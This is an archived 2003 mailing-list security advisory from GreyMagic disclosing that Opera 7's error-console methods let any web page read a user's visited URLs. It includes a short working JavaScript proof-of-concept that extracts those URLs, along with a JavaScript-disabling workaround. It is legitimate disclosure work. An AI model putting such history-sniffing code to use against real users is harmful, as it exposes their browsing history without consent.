[VulnWatch] Sniffing Opera's Tracks (GM#006-OP)

From: GreyMagic Software (security@greymagic.com)
Date: 02/04/03

  • Next message: Auriemma Luigi: "[VulnWatch] Unreal engine: results of my research"
    From: GreyMagic Software <security@greymagic.com>
    To: "vulnwatch@vulnwatch.org" <vulnwatch@vulnwatch.org>
    Date: Tue, 04 Feb 2003 11:14:26 "GMT"
    
    

    GreyMagic Security Advisory GM#006-OP
    =====================================

    By GreyMagic Software, Israel.
    04 Feb 2003.

    Available in HTML format at http://security.greymagic.com/adv/gm006-op/.

    Topic: Sniffing Opera's Tracks.

    Discovery date: 29 Jan 2003.

    Affected applications:
    ======================

    Opera 7 (final).

    Introduction:
    =============

    Opera recently released a new version of its browser.

    The new browser features a very useful Javascript console, which uses a few
    methods Opera implemented in the "opera" object.

    Discussion:
    ===========

    These methods appear in the comments of the "console.html" file as follows:

    * opera.errorIndex():
    Returns the index of the last error message. This index is monotonically
    increasing (which limits us to about 2^53 errors per Opera session).

    * opera.errorMessage(i):
    Returns the error message at index i. The value returned may be #f, if that
    message has been flushed from the cache.

    Opera hadn't bothered to restrict these methods to certain credentials and
    they are available for any web page to use. At first glance this doesn't
    appear to be a big deal, but a short inspection of the generated error
    messages reveals that each of them contains the URL that threw the
    exception.

    In practice, this means that a web page can extract a list of all URLs the
    user had visited and that threw any exceptions. And since Opera pretends to
    be Internet Explorer by default, it often encounters errors in web pages.
    Harvesting visited URLs had never been this simple.

    Exploit:
    ========

    The following code will generate a list of visited URLs:

    var sMsg,
    sFinal="",
    iLen=opera.errorIndex();

    for (var iErr=0;iErr<iLen;iErr++) {
    sMsg=opera.errorMessage(iErr);
    if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n";
    }
    alert(sFinal);

    Demonstration:
    ==============

    A proof-of-concept demonstration of this issue is available at
    http://security.greymagic.com/adv/gm006-op/.

    Solution:
    =========

    Until a patch becomes available, disable Javascript by going to: File ->
    Preferences -> Multimedia, and uncheck the "Enable JavaScript" item.

    Tested on:
    ==========

    Opera 7 NT4.
    Opera 7 Win98.
    Opera 7 Win2000.
    Opera 7 WinXP.

    Disclaimer:
    ===========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    GreyMagic Software is not liable for any direct or indirect damages caused
    as a result of using the information or demonstrations provided in any part
    of this advisory.

    Feedback:
    =========

    Please mail any questions or comments to security@greymagic.com.

    - Copyright 2003 GreyMagic Software.



    Relevant Pages

    • Re: Display File Selection Window
      ... hasn't (calling the form by its name would have to run on correct browser) ... error message of something along the lines for document.forms.formID has ... IE and Fx are OK but Opera still ... - open the File selector ...
      (comp.lang.javascript)
    • [NT] Sniffing Operas Tracks
      ... Opera recently released a new version of its browser. ... JavaScript code that will track down the user's complete navigating ... * Opera version 7.01 under the Windows operating system ... Returns the error message at index i. ...
      (Securiteam)
    • Re: Display File Selection Window
      ... hasn't (calling the form by its name would have to run on correct browser) ... error message of something along the lines for document.forms.formID has ... Nor with Opera or FF2.0. ...
      (comp.lang.javascript)
    • Sniffing Operas Tracks (GM#006-OP)
      ... Opera recently released a new version of its browser. ... The new browser features a very useful Javascript console, ... Returns the index of the last error message. ... The information in this advisory and any of its demonstrations is provided ...
      (Bugtraq)
    • Opera Browser goes Crash
      ... Subject: Opera Browser goes Crash ... I usually use Opera browser, ... but the other part is a large embedded sound file.. ... It didn't seem to give an error message or anything.. ...
      (Vuln-Dev)